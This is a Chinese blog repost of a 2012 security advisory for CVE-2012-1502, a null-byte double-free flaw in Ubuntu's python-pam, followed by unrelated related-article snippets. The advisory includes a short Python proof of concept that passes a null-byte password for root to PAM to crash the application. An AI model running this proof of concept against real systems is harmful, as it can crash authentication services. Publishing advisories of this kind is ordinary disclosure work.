linux设置好的密码拒绝访问,PyPAM密码空字节处理引用拒绝访问漏洞

最新推荐文章于 2022-05-24 15:06:32 发布
最新推荐文章于 2022-05-24 15:06:32 发布
阅读量100 收藏
点赞数
文章标签: linux设置好的密码拒绝访问

发布日期:2012-03-08

更新日期:2012-03-13

受影响系统:

Ubuntu Linux 11.x

Ubuntu Linux 10.x

Ubuntu PyPAM

描述:

--------------------------------------------------------------------------------

BUGTRAQ  ID: 52370

CVE ID: CVE-2012-1502

python-pam是Python到PAM库的接口。

PyPAM在验证包含空字节密码的实现上存在拒绝访问漏洞,攻击者可利用此漏洞造成应用崩溃。

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Markus Vervier ()提供了如下测试方法:

#!/usr/bin/env python

##

## python-pam 0.4.2 double free PoC

##

## 2012 Leading Security Experts GmbH

## Markus Vervier

##

# -*- coding: utf-8 -*-

def verify_password(user, password):

import PAM

def pam_conv(auth, query_list, userData):

resp = []

resp.append( (password, 0))

return resp

res = -3

service = 'passwd'

auth = PAM.pam()

auth.start(service)

auth.set_item(PAM.PAM_USER, user)

auth.set_item(PAM.PAM_CONV, pam_conv)

try:

auth.authenticate()

auth.acct_mgmt()

except PAM.error, resp:

print 'Go away! (%s)' % resp

res = -1

except:

print 'Internal error'

res = -2

else:

print 'Good to go!'

res = 0

return res

print verify_password("root", "a\x00secret")

建议:

--------------------------------------------------------------------------------

厂商补丁:

Ubuntu

------

目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

0b1331709591d260c1c78e86d0c51c18.png

Hdhnrjdjjf
关注
近期UNIX/Linux漏洞.pdf
09-06
OpenBSD的systrace组件中存在整数溢出漏洞,攻击者可以通过指定很大的整数值触发这个漏洞,导致绕过安全检查、向任意内核地址越界写入字节或读取内核内存块。 3. IBM商业性质UNIX操作系统多个工具实现上存在漏洞 ...
chatgpt赋能Python-python_pam
turensu的博客
05-24 114
本文由chatgpt生成,文章没有在chatgpt生成的基础上进行任何的修改。以上只是chatgpt能力的冰山一角。作为通用的Aigc大模型,只是展现它原本的实力。对于颠覆工作方式的ChatGPT,应该选择拥抱而不是抗拒,未来属于“会用”AI的人。🧡AI职场汇报智能办公文案写作效率提升教程 🧡专注于AI+职场+办公方向。下图是课程的整体大纲下图是AI职场汇报智能办公文案写作效率提升教程中用到的ai工具。
linux密码输错拒绝,【Linux】解决SSH服务拒绝密码
weixin_35822833的博客
04-29 1887
xShell连接Linux服务器提示密码错误。1、检查虚拟机SSH服务是否开启:service sshd status,如果没有开启,请执行service sshd start启动该服务,或者通过service sshd restart重启该服务;2、检查 /etc/ssh/ssh_config文件:ssh服务端口是否为22,Protocol协议版本是否为2(一般为2安全。1为ssh 1不安全,有...
Linux登录mysql密码正确被拒绝访问
卿染
09-04 5669
第一步:停止mysql服务 第二步:安全启动mysql 且跳过授权表 前两步我就不贴命令了,我的上一篇博客有https://blog.csdn.net/qq_40296032/article/details/100523895 第三步: grant all privileges on *.* to root@"%" identified by "你的密码"; 授予root的权限,设置为所...
Linux】解决SSH服务拒绝密码
热门推荐
唐Ian的博客
05-24 6万+
xShell连接Linux服务器提示密码错误。 1、检查虚拟机SSH服务是否开启: service sshd status,如果没有开启,请执行service sshd start启动该服务,或者通过service sshd restart重启该服务;2、检查 /etc/ssh/ssh_config文件: ssh服务端口是否为22,Protocol协议版本是否为
普通用户和root都被PAM拒绝登录的处理方法
linxizi0622的博客
11-13 3420
最近,ubuntu系统的服务器由于不知名的原因,被pam.d模块给拒绝登录了(包括普通用户和root用户),登录效果如图所示 说实话对于pam.d模块是个谜,其实我也没输错密码,并且就算我输错密码,为什么会输错28次,当然现象就是我无法用普通用户的身份登录系统,当然root用户也无法登录 如果root用户能够直接登录的话,那么就可以用rootY用户登录系统,并把普通用户解禁了。 这里,我把问题归结为忘记ubuntu登录密码这一类,并采用这个线索去寻找问题的解决方案 重启服务器,不断的按shift
LFI_autoexploiter:自动利用LFI Web漏洞。 它能够使用base64提取,字节绕过和URL编码绕过
03-11
自动利用LFI Web漏洞。 安装 就像这样简单:git clone 用法 用法:lfi_extractor.py [-h] [-URL URL] [-path_list PATH_LIST] [--b64 B64] [--url_enc URL_ENC] [--null NULL] [--output OUTPUT] [--static STATIC...
spring boot 下对JSON返回值去除null和字段操作
10-14
Fastjson是阿里巴巴提供的一个高性能的JSON库,它同样支持处理`null`值和字段。要在Spring Boot中配置Fastjson,你需要引入Fastjson的依赖,并创建一个配置类,例如`ResultConfig`: ```java @Configuration ...
linux pam鉴定令牌错误,linux – chsh:PAM身份验证失败
weixin_42444974的博客
05-13 1437
我想更改默认的shell env并以root用户身份运行chsh -s / bin / zsh,但出现错误消息:chsh:PAM身份验证失败.但答案并没有解决我的问题任何帮助,将不胜感激这是/etc/pam.d/chsh的内容## The PAM configuration file for the Shadow `chsh' service## This will not allow a use...
putty连接Linux时显示拒绝访问如何解决?
小方不是程序员的博客
04-07 5771
我们使用putty来连接Linux时遇到这个问题: 这时候问题所在就是我们的linux没有下载安装或没下载ssh服务, 这时候我们就在Linux操作系统输入:sudo apt-get openssh-server, 若还是显示无效操作,就是需要换到root用户:sudo -i 再输入apt-get install openssh-server 。 这是我们去putty连接 linux就可以成功了: ...
linux登录系统被拒绝访问权限,linux – (13)权限被拒绝:访问/cgi-bin/test.cgi被拒绝...
weixin_32137855的博客
04-29 875
我第一次尝试CGI脚本,但没有成功.我已经阅读了很多教程,并且可能会在不同的论坛上发帖,但是我无法使其工作.我在Fedora 10机器上使用appache web服务器.我总是有问题[Wed Oct 21 20:47:36 2009] [notice] SELinux policy enabled; httpd running as context unconfined_u:system_r:ht...
python调用pam模块进行linux用户验证
chenyulancn的专栏
11-06 3509
# (c) 2007 Chris AtLee # Licensed under the MIT license: # http://www.opensource.org/licenses/mit-license.php """ PAM module for python Provides an authenticate function that will allow the caller t
重置密码解决MySQL for Linux错误 ERROR 1045 (28000): Access denied for user 'root'@'localhost' (using passwor
qq_36408492的博客
02-27 773
一般这个错误是由密码错误引起,解决的办法自然就是重置密码。假设我们使用的是root账户。1.重置密码的第一步就是跳过MySQL的密码认证过程,方法如下:#vim /etc/my.cnf(注:windows下修改的是my.ini)在文档内搜索mysqld定位到[mysqld]文本段:/mysqld(在vim编辑状态下直接输入该命令可搜索文本内容)在[mysqld]后面任意一行添加“skip-gran...
linux解决ssh密码拒绝登入问题
weixin_51459144的博客
05-24 2384
第零步:安装ssh服务器: sudo apt-get installopenssh-server 第一步:进入文件目录:cd /etc/ssh 第二步:以管理员身份 打开sshd_config文件 : sudo vim sshd_config 第三步:在文件中找到 PermitRootLogin prohibit-password将其改成PermitRootLogin yes保存在退出 第四步:在终端执行命令:sudo service ssh restart ...
Linux SSH Access denied(拒绝访问)解决方案
Android framework
05-22 1万+
新安装的 CentOS 7 使用 SSH 连接出现 Access denied,记录一下这个坑。 详细问题如下(见图): 解决方案 查了下资料,Linux 系统默认就是禁止远程登录的。那就打开权限就行了。 因为需要修改系统设置,普通用户会出现没有权限,所以在超级管理员下操作,输入 su root 在输入密码便可(如图): 安装 openssh-server yum -y install openssh-server 1 检查下 SSH 版本 ps -e |grep ssh 1 见下图:ssh-serve
html用户名密码不能为
最新发布
06-10
这不是一个问题,而是一个陈述。不过,我理解你想表达的意思。确保在HTML表单中输入用户名和密码时,要求用户填写这些字段,以...可以通过以下方式实现: ``` ... 密码: ...使用`required`属性可以防止提交字段。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值